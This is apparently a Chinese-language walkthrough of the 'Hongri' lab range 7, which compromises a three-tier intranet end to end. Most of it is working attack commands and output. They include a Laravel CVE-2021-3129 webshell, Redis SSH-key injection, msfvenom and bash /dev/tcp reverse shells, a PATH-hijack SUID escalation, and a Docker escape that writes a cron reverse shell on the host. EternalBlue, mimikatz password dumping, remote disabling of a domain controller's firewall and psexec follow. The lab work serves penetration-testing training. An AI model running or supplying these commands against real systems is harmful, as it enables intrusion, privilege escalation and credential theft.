带你打穿三层内网-红日靶场七

文章目录

前记

所用工具

注意事项

  • msf的永恒之蓝每次都需要两次才能成功,即第二次才能成功,不成功可以多试试
  • 为模拟真实渗透环境,搭建了一层vps环境
  • 第二层内网本该出网的,为增加难度设置为不出网

环境配置

vm1,vm2,vm3均不出网

kali:192.168.123.128(vm3)

vps:192.168.123.129(vm3)

web1:192.168.52.10(vm1)
192.168.123.243(vm3)

web2:192.168.52.20(vm1)
192.168.93.10(vm2)

win7(PC1):192.168.52.30(vm1)
192.168.93.20(vm2)

win7(PC2):192.168.93.40(vm2)

DC:192.168.93.30(vm2)

其他信息

DMZ区域:
给Ubuntu (Web 1) 配置了两个网卡,一个可以对外提供服务;一个连接第二层网络。

第二层网络区域:
给Ubuntu (Web 2) 和Windows 7 (PC 1)都配置了两个网卡,一个连接第二层网络,一个连接第三层网络。

第三次网络区域:
给Windows Server 2012和Windows 7 (PC 2)都只配置了一个网卡,连接第三层网络。


Administrator:Whoami2021
bunny:Bunny2021
moretz:Moretz2021
Ubuntu 1: ubuntu:web2021
Ubuntu 2: ubuntu:ubuntu
通达OA账户: admin:admin657260

DMZ区的 Ubuntu 需要启动nginx服务:
sudo redis-server /etc/redis.conf
sudo /usr/sbin/nginx -c /etc/nginx/nginx.conf
sudo iptables -F
第二层网络的 Ubuntu需要启动docker容器:
sudo service docker start
sudo docker start 8e172820ac78
第三层网络的 Windows 7 (PC 1)需要启动通达OA:
C:\MYOA\bin\AutoConfig.exe

web1

信息搜集

sudo nmap -sS -Pn -n --open --min-hostgroup 4 --min-parallelism 512 --host-timeout 30 -T3 -v -oG result.txt --script http-methods --script-args http.useragent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0" 192.168.123.243 -p 0-65535

22/tcp   open  ssh
80/tcp   open  http
81/tcp   open  hosts2-ns
6379/tcp open  redis

22可以爆破ssh

80无法访问,81是一个Laravel框架

6379可尝试未授权访问、弱口令爆破

./fscan -h 192.168.123.243
[+] Redis:192.168.123.172:6379 unauthorized file:/home/web/dump.rdb
[+] Redis:192.168.123.172:6379 like can write /root/.ssh/
[+] Redis:192.168.123.172:6379 like can write /var/spool/cron/
[*] WebTitle: http://192.168.123.172    code:404 len:548    title:404 Not Found
[*] WebTitle: http://192.168.123.172:81 code:200 len:17474  title:Laravel
[+] InfoScan: http://192.168.123.172:81 [Laravel] 
[+] http://192.168.123.172:81 poc-yaml-laravel-cve-2021-3129

redis未授权,laravel存在cve

whatweb http://192.168.123.243:81/
发现这里是nginx中间件
http://192.168.123.243:81/ [200 OK] Cookies[XSRF-TOKEN,laravel_session], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][nginx/1.14.0 (Ubuntu)], HttpOnly[laravel_session], IP[192.168.123.243], Laravel, PHP[7.4.14], Title[Laravel], X-Powered-By[PHP/7.4.14], nginx[1.14.0]

cve-2021-3129

先从81的Laravel框架漏洞入手

python laravel.py -u http://192.168.123.243:81/
python laravel.py -u http://192.168.123.243:81/ --exp
成功写入webshell, 访问地址 http://192.168.123.243:81/shell.php , 密码 whoami

拿到shell,为www权限

ls -alh /.dockerenv    非docker环境,一般没有这个.dockerenv文件
cat /proc/1/cgroup
cat /proc/self/status | grep CapEff

发现是docker,非特权模式开启的。先放着看看6379端口

redis未授权|ssh密钥

(1)redis绑定在 0.0.0.0:6379,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略,直接暴露在公网;

(2)没有设置密码认证(一般为空),可以免密码远程登录redis服务。

探测漏洞

python2 redis.py 192.168.123.243 6379
探测确实存在漏洞

利用漏洞

sudo su root
ssh-keygen -t rsa  #生成公钥
(echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > 1.txt
cat 1.txt | redis-cli -h 192.168.123.243 -p 6379 -x set hello
redis-cli -h 192.168.123.243
config set dir /root/.ssh
config set dbfilename authorized_keys
save
cd /root/.ssh/
ssh -i id_rsa root@192.168.123.243

后渗透

目标机器为linux,我们通过frp反向代理到vps,上线msf

frp配置

[common]
server_addr = 192.168.123.129
server_port = 9876
tls_enable = true
token = coleak
 
[CS_Server_6666]
type = tcp
local_ip = 127.0.0.1
local_port = 6666
remote_port = 6666
 
[Beacon]
type = tcp
local_ip = 127.0.0.1
local_port = 6667
remote_port = 6667

[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 7777
remote_port = 7777

[cs->msf]
type = tcp
local_ip = 127.0.0.1
local_port = 4566
remote_port = 4566

[server]
type = tcp
local_ip = 127.0.0.1
local_port = 80
remote_port = 8888

上线msf

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.123.129 LPORT=7777 -f elf > shell.elf


use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 7777
show options
set AutoRunScript migrate -f
set PrependMigrate true
exploit


python -m http.server 80
wget http://192.168.123.129:8888/shell.elf
chmod +x shell.elf
./shell.elf

上线cs

监听https端口,6667
./genCrossC2.Linux 192.168.123.129 6667 .cobaltstrike.beacon_keys null Linux x64 /home/coleak/桌面/CrossC2-test
python -m http.server 80
wget http://192.168.123.129:8888/CrossC2-test
chmod +x CrossC2-test

Venom

agent监听端口,admin发起连接
wget http://192.168.123.129:8888/agent_linux_x64
./agent_linux_x64 -lport 8888
./admin_linux_x64 -rhost 192.168.123.243 -rport 8888

这里我们先把fscan上传到目标机器,对内网进行扫描

wget http://192.168.123.129:8888/fscan_amd64
chmod +x fscan_amd64
./fscan_amd64 -h 192.168.52.0/24

(icmp) Target 192.168.52.10   is alive
(icmp) Target 192.168.52.20   is alive
(icmp) Target 192.168.52.30   is alive
[*] Icmp alive hosts len is: 3
192.168.52.10:8888 open
192.168.52.20:8000 open
192.168.52.30:8080 open
192.168.52.30:445 open
192.168.52.30:139 open
192.168.52.30:135 open
192.168.52.20:22 open
192.168.52.10:22 open
192.168.52.10:81 open
192.168.52.10:80 open
[*] alive ports len is: 10
start vulscan
[+] 192.168.52.30       MS17-010        (Windows 7 Professional 7601 Service Pack 1)
[*] NetBios: 192.168.52.30   PC1.whoamianony.org                 Windows 7 Professional 7601 Service Pack 1 
[*] WebTitle: http://192.168.52.30:8080 code:200 len:10065  title:通达OA网络智能办公系统
[+] InfoScan:http://192.168.52.30:8080 [通达OA] 
[+] http://192.168.52.30:8080 tongda-user-session-disclosure 
[*] WebTitle: http://192.168.52.10      code:404 len:548    title:404 Not Found
[*] WebTitle: http://192.168.52.20:8000 code:200 len:17474  title:Laravel
[+] InfoScan:http://192.168.52.20:8000 [Laravel]

尝试MS17-010永恒之蓝进入win7

至于52.20这台机器从8000和22端口入手

这里查看nginx配置文件

nginx -t
nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful
cd /etc/nginx/conf.d/
cat 80
server {
    listen 80;
    server_name www.whopen.com;

    location / {
       proxy_pass https://whoamianony.top/;
    }
}

cat 81
server {
    listen 81;
    server_name localhost;

    location / {
       proxy_pass http://192.168.52.20:8000;
    }
}

外网81服务是内网8000进行Nginx反代出来的

Win7(PC1)

永恒之蓝

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhost 192.168.52.30
set RPORT 445
set lport 8526
setg Proxies socks5:127.0.0.1:9999
setg ReverseAllowProxy true
run

拿到web2的system权限,由于是windows,,所以上线cs操作

通过frp上线pc1到cs

在web1上开启s端

[common]
bind_port = 6789

在vps开启c端

[common]
server_addr = 192.168.123.243
server_port = 6789

[Beacon]
type = tcp
local_ip = 127.0.0.1
local_port = 6667
remote_port = 6667

注意我们已经将kali的6667和vps的6667关联,所以其实web1的6667最终流量会到达kali,注意监听器需要设置为web1的内网ip,通过http连接

upload beacon1.exe c://Python27
shell
chcp 65001
beacon1.exe

web2

根据之前对nginx配置分析得知

http://192.168.123.243:81/shell.php , 密码 whoami
直接访问http://192.168.52.20:8000/shell.php

上线为www权限,还在docker中,考虑提权再逃逸

find / -perm -u=s -type f 2>/dev/null

/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/sudo
/home/jobs/shell
/bin/mount
/bin/su
/bin/umount

反弹shell,这里需要将kali的监听端口转发到web1上,然后让web2来连接web1

nc -lvp 3443
lforward 127.0.0.1 3443 3443
bash -c "bash -i >& /dev/tcp/192.168.52.10/3443 0>&1"

依次查找相关信息,发现shell可能存在漏洞,执行了ps命令

PID TTY TIME CMD

1 ? 00:00:00 apache2

119 ? 00:00:00 shell

120 ? 00:00:00 sh

121 ? 00:00:00 ps

cd /tmp
echo "/bin/bash" > ps
chmod 777 ps
echo $PATH 
export PATH=/tmp:$PATH
cd /home/jobs
./shell

通过suid提权成功拿到root权限

docker逃逸

检测是否为特权模式开启

cat /proc/self/status | grep CapEff
以特权模式启动的话,CapEff 对应的掩码值应该为0000003fffffffff 或者是 0000001fffffffff

监听3445端口,并端口转发到web1

nc -lvp 3445
lforward 127.0.0.1 3445 3445

设置定时任务将宿主机反弹shell到web1,再到kali

fdisk -l
mkdir /hacker
mount /dev/sda1 /hacker
touch /hacker/hacker.sh
echo "bash -i >& /dev/tcp/192.168.52.10/3445 0>&1" >/hacker/hacker.sh
echo "* * * * * root bash /hacker.sh" >> /hacker/etc/crontab

成功拿下web2的root权限

win7(PC2)|DC

通过win7(pc1)横向渗透,抓取hash和明文可以抓取到域内用户bunny的密码值,上传fscan对93c段进行扫描

shell C:\Python27\fscan64.exe -h 192.168.93.0/24 > 11.txt
download C:\Python27\11.txt

下载后放在目录/home/coleak/桌面/cs4.7by_mht_vip/downloads/中

start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 192.168.93.20   is alive
(icmp) Target 192.168.93.30   is alive
(icmp) Target 192.168.93.40   is alive
[*] Icmp alive hosts len is: 3
192.168.93.20:445 open
192.168.93.40:139 open
192.168.93.30:88 open
192.168.93.20:8080 open
192.168.93.40:445 open
192.168.93.30:445 open
192.168.93.30:139 open
192.168.93.40:135 open
192.168.93.30:135 open
192.168.93.20:139 open
192.168.93.20:135 open
[*] alive ports len is: 11
start vulscan
[+] 192.168.93.20	MS17-010	(Windows 7 Professional 7601 Service Pack 1)
[*] NetInfo:
[*]192.168.93.30
   [->]DC
   [->]192.168.93.30
[+] 192.168.93.40	MS17-010	(Windows 7 Professional 7601 Service Pack 1)
[+] 192.168.93.30	MS17-010	(Windows Server 2012 R2 Datacenter 9600)
[*] NetBios: 192.168.93.40   PC2.whoamianony.org                 Windows 7 Professional 7601 Service Pack 1 
[*] NetBios: 192.168.93.30   [+]DC DC.whoamianony.org            Windows Server 2012 R2 Datacenter 9600 
[*] WebTitle: http://192.168.93.20:8080 code:200 len:10065  title:通达OA网络智能办公系统
[+] InfoScan:http://192.168.93.20:8080 [通达OA] 
[+] http://192.168.93.20:8080 tongda-user-session-disclosure 
已完成 11/11
[*] 扫描结束,耗时: 15.9012269s

发现DC和win7-2均存在MS17-010永恒之蓝,上线venom

goto 1
listen 8081
shell C:\Python27\agent.exe -rhost 192.168.52.10 -rport 8081
goto 2
socks 19999

通过msf上线

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhost 192.168.93.30
set RPORT 445
set lport 8527
setg Proxies socks5:127.0.0.1:19999
setg ReverseAllowProxy true
run

这里域控上线失败了,但是win7-2成功!

migrate 1316
load kiwi
kiwi_cmd privilege::debug
kiwi_cmd sekurlsa::logonPasswords

成功抓到域用户和域管理员的密码

  • bunny:Bunny2021
  • administrator:Whoami2021

通过转发上线设置一个pc1的中转监听器,生成exe,上线cs

upload beacon2.exe c://MYOA

在win7上关闭dc的防火墙

net use \192.168.93.30\ipc$ "Whoami2021" /user:"Administrator"
sc \\192.168.93.30 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"
sc \\192.168.93.30 start unablefirewall

psexec到dc

use exploit/windows/smb/psexec
set payload windows/meterpreter/bind_tcp
set rhost 192.168.93.30
set smbuser administrator
set smbpass Whoami2021
setg Proxies socks5:127.0.0.1:19999
setg ReverseAllowProxy true
run
相关推荐
brrdg_sefg1 分钟前
WEB 漏洞 - 文件包含漏洞深度解析
前端·网络·安全
浏览器爱好者21 分钟前
谷歌浏览器的网络安全检测工具介绍
chrome·安全
H轨迹H27 分钟前
SolidState靶机通关教程及提权
网络安全·渗透测试·靶机·oscp
独行soc2 小时前
#渗透测试#漏洞挖掘#红蓝攻防#护网#sql注入介绍11基于XML的SQL注入(XML-Based SQL Injection)
数据库·安全·web安全·漏洞挖掘·sql注入·hw·xml注入
D1TAsec2 小时前
Powercat 无文件落地执行技巧,你确定不进来看看?
网络安全
文大。2 小时前
2024年广西职工职业技能大赛-Spring
java·spring·网络安全
风间琉璃""2 小时前
bugkctf 渗透测试1超详细版
数据库·web安全·网络安全·渗透测试·内网·安全工具
儒道易行3 小时前
【DSVW】攻防实战全记录
web安全·网络安全
安全方案5 小时前
如何增强网络安全意识?(附培训PPT资料)
网络·安全·web安全